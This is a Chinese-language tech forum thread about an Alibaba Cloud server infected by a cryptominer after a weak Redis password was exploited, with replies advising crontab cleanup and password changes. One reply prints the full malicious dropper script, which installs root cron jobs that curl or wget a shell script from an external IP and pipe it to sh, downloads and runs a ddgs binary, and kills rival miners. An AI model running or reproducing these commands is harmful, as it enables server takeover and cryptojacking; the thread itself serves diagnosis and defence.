鍍金池/ 問答/Linux  網(wǎng)絡(luò)安全/ linux cpu占用異常,多次登錄失敗記錄,請大佬分析一下

linux cpu占用異常,多次登錄失敗記錄,請大佬分析一下

最近突然發(fā)現(xiàn)一個阿里云服務(wù)器cpu占用異常,而且短時間內(nèi)有多次登錄失敗記錄;請問有人了解嗎?

clipboard.png
幾分鐘沒有登錄就已經(jīng)有三百多次失敗記錄
使用top查看發(fā)現(xiàn)該進(jìn)程

clipboard.png
該進(jìn)程的運(yùn)行文件是一個在/tmp/文件夾下的qW3xT可執(zhí)行文件

clipboard.png
查看進(jìn)程樹如下

clipboard.png

回答
編輯回答
扯機(jī)薄

crontab -l查看一下任務(wù)
有任務(wù)的話 殺死 看看腳本文件位置 刪除

2018年8月5日 02:12
編輯回答
夕顏

不知道redis最好不要開端口嗎?要開也不能開默認(rèn)端口啊

2017年9月18日 09:49
編輯回答
尐飯團(tuán)

我的服務(wù)器今天也是被這個挖坑的程序一直占用cpu 99%

2017年9月28日 00:37
編輯回答
神曲

謝謝兩位大佬,確實是個挖礦腳本,被設(shè)置了定時任務(wù),經(jīng)驗不足。
應(yīng)該是redis密碼太弱,被掃到了,希望大家設(shè)置redis不要使用簡單密碼,執(zhí)行腳本我下下來了

export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin

echo "*/5 * * * * curl -fsSL http://165.225.157.157:8000/i.sh | sh" > /var/spool/cron/root
echo "*/5 * * * * wget -q -O- http://165.225.157.157:8000/i.sh | sh" >> /var/spool/cron/root
mkdir -p /var/spool/cron/crontabs
echo "*/5 * * * * curl -fsSL http://165.225.157.157:8000/i.sh | sh" > /var/spool/cron/crontabs/root
echo "*/5 * * * * wget -q -O- http://165.225.157.157:8000/i.sh | sh" >> /var/spool/cron/crontabs/root

ps auxf | grep -v grep | grep /tmp/ddgs.3011 || rm -rf /tmp/ddgs.3011
if [ ! -f "/tmp/ddgs.3011" ]; then
    curl -fsSL http://165.225.157.157:8000/static/3011/ddgs.$(uname -m) -o /tmp/ddgs.3011
fi
chmod +x /tmp/ddgs.3011 && /tmp/ddgs.3011

ps auxf | grep -v grep | grep Circle_MI | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep get.bi-chi.com | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep hashvault.pro | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep nanopool.org | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep minexmr.com | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep /boot/efi/ | awk '{print $2}' | xargs kill

供參考
另外發(fā)現(xiàn)在reids被利用之后,有一個ip每幾分鐘就會嘗試登錄服務(wù)器,持續(xù)到現(xiàn)在

2017年7月10日 20:45
編輯回答
初心

遇到過,關(guān)閉定時任務(wù),修改reids密碼,重啟一下就可以了,應(yīng)該是挖礦的

2018年3月6日 12:39